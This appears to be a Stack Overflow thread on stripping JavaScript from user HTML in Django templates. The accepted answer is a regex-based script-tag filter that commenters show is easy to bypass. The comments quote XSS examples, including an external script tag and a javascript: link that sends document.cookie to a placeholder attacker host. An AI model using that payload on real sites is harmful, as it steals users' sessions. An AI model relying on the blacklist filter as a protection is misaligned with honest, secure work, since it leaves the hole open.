# Strip javascript code before rendering in django templates

Tags: javascript, python, django

```
{% if posts %}
    {% for p in posts %}
        {{p|safe}}
    {% endfor %}
{% endif %}
```

I want this to render html but not javascript, what should I do?

Comment: so escape the javascript, or not show it at all?

Comment: It would probably be best to actually use an HTML parser to strip out everything you **didn't** want to include when the code is saved rather than filtering out potentially evil code every time the template renders.

Answer (score 4, accepted):

There is no filter in `django` that can do what ou want: strip javascript and leave html.

You can create a custom template filter to do that:

```
from django import template
from django.template.defaultfilters import stringfilter
from django.utils.safestring import mark_safe
from django.utils.encoding import force_unicode
import re

register = template.Library()

@register.filter
@stringfilter
def stripjs(value):
    stripped = re.sub(r'<script(?:\s[^>]*)?(>(?:.(?!/script>))*</script>|/>)', \
                      '', force_unicode(value), flags=re.S)
    return mark_safe(stripped)
```

(Where to put template filters/tags: [Custom template tags and filters/Code layout](https://docs.djangoproject.com/en/dev/howto/custom-template-tags/#code-layout))

**Brief explanation:**

Create a folder named `templatetags` in your application folder. Add an empty file `__init__.py` (for it to be a package) and a module file that will contain the filter, `my_filters.py`. Copy the code in that file.

In the template file add (before any first use of the filter): `{% load my_filters %}`

#### Usage:

```
{% if posts %}
    {% for p in posts %}
        {{ p|stripjs }}
    {% endfor %}
{% endif %}
```

Comment: For some reason it can't use the filter. "stripjs is an invalid filter" even though it is there, maybe it is crashing?

Comment: I tested it & it works. Have you loaded the filter module into the template (using`{% load %}` tag)?

Comment: yep, I don't know what's wrong, all other filters I've done are imported correctly http://dpaste.com/557597/

Comment: I would do a little more than that -- don't forget there are a *lot* of ways to be evil. As a *simple* example, your code will allow `<script src="http://evil.hl/my/evil/js.js"></script>`.  See: http://ha.ckers.org/xss.html  It would probably be best to actually use an HTML parser to strip out everything you **didn't** want to include when the code is first saved to the database. (Whitelists are stronger than blacklists).

Comment: @Sean Viera: you're right of course, this is a first version of a possible solution to OP's problem. I'll work on that.

Comment: @madprops: why are you redefining `stringfilter`, not using django's?

Comment: @manji I started editing a file that already had that definition, I've imported django's stringfilter and removed the other, but still the same problem :/

Comment: @madprops, Can you put the whole stack trace?

Comment: @manji ok my mistake, the same file was being overwritten in other place apparently, works now

Comment: this is going to be harder than I thought, tag attributes like onerror can have javascript code

Comment: @madprops - yep, that's the issue. Some suggestiongs ... look into lxml (the Python binding for it) or elementTree and only allow things through that are on your list (have a list of **allowed** elements and attributes, rather than a list of **forbidden** elements and attributes.)

Comment: One also wants to clean links with javascript stuff like  href="javascript:location.href='http://pwnya.example.com?c='+encodeURI(JSON.stringify(document.cookie));"